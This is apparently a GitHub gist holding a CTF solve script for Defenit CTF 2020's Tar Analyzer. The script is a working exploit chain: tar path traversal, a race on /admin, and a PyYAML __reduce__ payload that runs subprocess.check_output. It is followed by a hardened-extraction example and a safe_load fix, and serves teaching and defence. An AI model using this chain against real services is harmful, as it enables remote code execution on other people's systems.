@shpik-kr
Last active June 8, 2020 02:06
Defenit CTF 2020 - Tar Analyzer
#!/usr/bin/python
import requests
import os
import threading
import yaml
import subprocess
'''
Vulnerabilities:
1. Directory Traversal + File upload: the uploaded tar is unpacked with tarfile's extractall(), which does not check member names, so a member named ../../config.yaml is written into the parent folders of the extraction directory.
2. Race Condition: when a user accesses the "/admin" endpoint, `config.yaml` is first rewritten with the default configuration and then loaded, so an overwriting upload has to land in the window between the reset and the load.
3. Remote Command Execution: the config is loaded with the unsafe loader, `config = load(fp.read(), Loader=Loader)`, which instantiates arbitrary Python objects from `!!python/object/apply` tags.
Attack:
1. Upload a config.yaml that causes RCE, like this (same idea as a pickle RCE gadget):
```
class exp(object):
    def __reduce__(self):
        return (subprocess.check_output,(['ls','-al'],))
data = yaml.dump({'allow_host':"blahblah", 'message':exp()})
```
2. Get the flag by accessing the "/admin" endpoint (race condition).
'''
url = "http://tar-analyzer.ctf.defenit.kr:8080"
admin_url = url + "/admin"
upload_url = url + "/analyze"

def initialize(ip):
    # Payload object: PyYAML serializes it through __reduce__ as a
    # !!python/object/apply:subprocess.check_output tag, which the server's
    # unsafe Loader executes when it loads config.yaml.
    class exp(object):
        def __reduce__(self):
            return (subprocess.check_output, (['ls', '-al'],))
    data = yaml.dump({'allow_host': ip, 'message': exp()})
    # Write the payload at the path the traversal member must have, then
    # archive it. -P keeps the leading ../ in the member name; without it
    # GNU tar strips it ("Removing leading `../' from member names") and
    # the file would land inside the extraction directory instead.
    with open("../../config.yaml", "w") as f:
        f.write(data)
    os.system("tar -cvPf exp.tar ../../config.yaml")

def do_trigger():
    # /admin resets config.yaml and loads it; if an upload wins the race,
    # the loaded 'message' is the command output.
    r = requests.get(admin_url)
    print(r.text)

def do_upload_yaml():
    # Upload exp.tar; the server's extractall() writes ../../config.yaml.
    files = {
        "file": open("exp.tar", "rb")
    }
    r = requests.post(upload_url, files=files)

ip = "[here]"
initialize(ip)
# Fire uploads and /admin requests concurrently to hit the reset/load window.
for idx in range(10):
    t = threading.Thread(target=do_upload_yaml, args=())
    v = threading.Thread(target=do_trigger, args=())
    t.start()
    v.start()
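The first bug in the docstring, the unchecked tarfile extractall(), as an added example that is not part of the gist or the challenge code: it builds an in-memory tar whose only member is ../../config.yaml (the same shape as exp.tar), runs it through an extractall() call like the challenge's, and runs it through a checked extractor that rejects members resolving outside the destination. The directory names (app/uploads/extracted), the YAML contents and the benign report/summary.txt member are constructed placeholders. Python 3 is assumed.

```python
import io
import os
import tarfile
import tempfile

# Extraction filters (PEP 706) exist on 3.12+ and the security backports;
# when present, the filter is named explicitly so behaviour is deterministic
# (on 3.14 the default would already refuse the traversal member).
_HAS_FILTERS = hasattr(tarfile, "data_filter")


def _filter_kwargs(trusted):
    if not _HAS_FILTERS:
        return {}
    return {"filter": "fully_trusted" if trusted else "data"}


def build_tar(member_name, payload):
    """Build an in-memory tar with a single regular-file member (constructed
    input; tar -P would produce the same member name on the command line)."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w") as tar:
        info = tarfile.TarInfo(name=member_name)
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def extract_vulnerable(tar_bytes, dest):
    """The pattern the challenge used: extractall() trusts member names."""
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        tar.extractall(dest, **_filter_kwargs(trusted=True))


def extract_hardened(tar_bytes, dest):
    """Extract only regular files and directories whose resolved path stays
    under dest; return the member names that were written."""
    dest_real = os.path.realpath(dest)
    extracted = []
    with tarfile.open(fileobj=io.BytesIO(tar_bytes), mode="r") as tar:
        for member in tar.getmembers():
            target = os.path.realpath(os.path.join(dest_real, member.name))
            if os.path.commonpath([dest_real, target]) != dest_real:
                raise ValueError("member escapes destination: %r" % member.name)
            if not (member.isfile() or member.isdir()):
                # Symlinks and hard links could redirect later writes.
                raise ValueError("unsupported member type: %r" % member.name)
            tar.extract(member, dest_real, **_filter_kwargs(trusted=False))
            extracted.append(member.name)
    return extracted


def demo():
    """Run both extractors in a scratch tree laid out as
    <root>/app/uploads/extracted (hypothetical layout) and report results."""
    traversal = build_tar("../../config.yaml", b"allow_host: attacker\nmessage: hi\n")
    benign = build_tar("report/summary.txt", b"ok\n")
    with tempfile.TemporaryDirectory() as root:
        extract_dir = os.path.join(root, "app", "uploads", "extracted")
        os.makedirs(extract_dir)

        # Vulnerable path: the member lands two levels up, in app/config.yaml.
        extract_vulnerable(traversal, extract_dir)
        landed_outside = os.path.isfile(os.path.join(root, "app", "config.yaml"))

        # Hardened path: the same archive is refused before anything is written.
        try:
            extract_hardened(traversal, extract_dir)
            rejected = False
        except ValueError:
            rejected = True

        # A well-formed archive still extracts normally.
        benign_members = extract_hardened(benign, extract_dir)
        benign_ok = os.path.isfile(os.path.join(extract_dir, "report", "summary.txt"))
    return {
        "landed_outside": landed_outside,
        "rejected": rejected,
        "benign_members": benign_members,
        "benign_ok": benign_ok,
    }


if __name__ == "__main__":
    print(demo())
```

The check resolves each member against the real destination path before extracting, so a name like ../../config.yaml is rejected even when the destination itself sits behind a symlink. The config-side counterpart of the same fix is loading config.yaml with yaml.safe_load(), which refuses !!python/object/apply tags and so would never call subprocess.check_output from the uploaded file.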